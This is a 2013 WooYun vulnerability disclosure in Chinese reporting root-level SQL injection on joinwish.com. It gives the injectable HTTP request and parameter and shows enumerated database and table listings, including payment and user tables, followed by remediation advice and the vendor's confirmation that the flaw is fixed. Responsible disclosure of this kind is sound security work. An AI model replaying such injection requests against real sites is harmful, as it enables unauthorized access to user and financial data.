当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034484

漏洞标题:好愿网多处root权限SQL注射秒读数据

相关厂商:joinwish.com

漏洞作者: 小胖子

提交时间:2013-08-16 10:56

修复时间:2013-09-30 10:57

公开时间:2013-09-30 10:57

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-16: 细节已通知厂商并且等待厂商处理中
2013-08-19: 厂商已经确认,细节仅向厂商公开
2013-08-29: 细节向核心白帽子及相关领域专家公开
2013-09-08: 细节向普通白帽子公开
2013-09-18: 细节向实习白帽子公开
2013-09-30: 细节向公众公开

简要描述:

听说好愿网很爱发礼物,所以我就来了。

详细说明:

全站基本做了伪静态,但是仔细翻还是能翻到有动态参数的地方。
注入点:

GET /wishservice/sponsors?uid=1&wid=10067221&sval=id HTTP/1.1
Referer: http://www.joinwish.com/wish/show/id/10067221
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.joinwish.com
Cookie: PHPSESSID=1km4sivvelstuqmolpqjspjq62
Accept-Encoding: gzip, deflate


注入参数uid,DBA权限,time based,读数据秒读。

.png


还有很多其他地方也存在注射,参数不同,请都一并自查并修复。

WID.png


有注射的地方以及参数。

.png


数据库还是蛮多的。

.png


over。

漏洞证明:

数据库:

available databases [9]:
[*] huluwu
[*] huluwu_dev
[*] information_schema
[*] joinwish_product
[*] joinwish_verify
[*] logs
[*] mysql
[*] performance_schema
[*] test


当前数据库joinwish_product的数据表。

Database: joinwish_product
[132 tables]
+------------------------------+
| account_freeze_tx            |
| account_topups               |
| account_transfers            |
| account_tx                   |
| account_withdraws            |
| accounts                     |
| alipay_transfer              |
| alipay_transfer_batch        |
| areas                        |
| auth_group                   |
| auth_group_permissions       |
| auth_permission              |
| auth_user                    |
| auth_user_groups             |
| auth_user_user_permissions   |
| backend_tx                   |
| backends                     |
| bank_cities                  |
| bank_provinces               |
| barcode_types                |
| biz_card_bindings            |
| brands                       |
| c2c_topup_requests           |
| card_items                   |
| cities                       |
| cs_logs                      |
| cs_roles                     |
| cs_user_functions            |
| cs_user_role_functions       |
| cs_user_roles                |
| cs_users                     |
| django_admin_log             |
| django_content_type          |
| django_session               |
| django_site                  |
| errors                       |
| exchanges_users              |
| favorite_wishes              |
| gateway_audit                |
| gateway_audit_result         |
| gateway_order                |
| give_user_brand              |
| hulu_card_no_libs            |
| invitees                     |
| merchants                    |
| mptopup_orders               |
| offline_transfers            |
| p2p_catalogs                 |
| p2p_comment                  |
| p2p_commodities              |
| p2p_exchange_0               |
| p2p_exchange_1               |
| p2p_merchant                 |
| p2p_order                    |
| p2p_send_transaction         |
| p2p_send_withdraw            |
| p2p_settlement_payment_batch |
| p2p_ticket                   |
| p2p_ticket_batch             |
| payment_card_logs            |
| payment_channels             |
| payment_orders               |
| properties                   |
| provinces                    |
| public_utility_orders        |
| refunded_transactions        |
| settlement                   |
| settlement_detail            |
| shopping_items               |
| shopping_orders              |
| terminal_requests            |
| transaction_details          |
| transactions                 |
| tx_types                     |
| user_addresses               |
| user_backends                |
| user_friends                 |
| user_mp_verify_codes         |
| user_reg_requests            |
| user_saved_cards             |
| user_sessions                |
| user_uploaded_pic_catalogs   |
| user_uploaded_pics           |
| user_wish_statistics         |
| users                        |
| weibo_template               |
| wish_albums                  |
| wish_amount_increase_logs    |
| wish_award_logs              |
| wish_base                    |
| wish_cash_coupons            |
| wish_comments                |
| wish_commodities             |
| wish_cs_roles                |
| wish_cs_user_functions       |
| wish_cs_user_role_functions  |
| wish_cs_user_roles           |
| wish_cs_users                |
| wish_details                 |
| wish_exchange_items          |
| wish_exchange_tocheck_users  |
| wish_exchange_view           |
| wish_exchanges               |
| wish_fans                    |
| wish_gifts                   |
| wish_give_logs               |
| wish_give_tx                 |
| wish_guest_infos             |
| wish_hp_use_logs             |
| wish_join_requests           |
| wish_members                 |
| wish_mer_exchange            |
| wish_merchants               |
| wish_msgs                    |
| wish_pdts                    |
| wish_praise_statistical      |
| wish_prop_logs               |
| wish_pub_logs                |
| wish_solutions               |
| wish_themes                  |
| wish_transfers               |
| wish_user_banding            |
| wish_user_guides             |
| wish_user_notification       |
| wish_user_verification       |
| wish_users                   |
| wish_visit_logs              |
| wishes                       |
| withdraw_fee_rate            |
| ym_sms                       |
| ym_sms_mo                    |
| ym_sms_mt                    |
+------------------------------+


修复方案:

0x1:预编译,过滤,等等方式。
0x2:数据库权限太高了。
0x3:我是厚着脸皮要礼物的。

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-19 14:44

厂商回复:

已修复,今天统一发布

最新状态:

暂无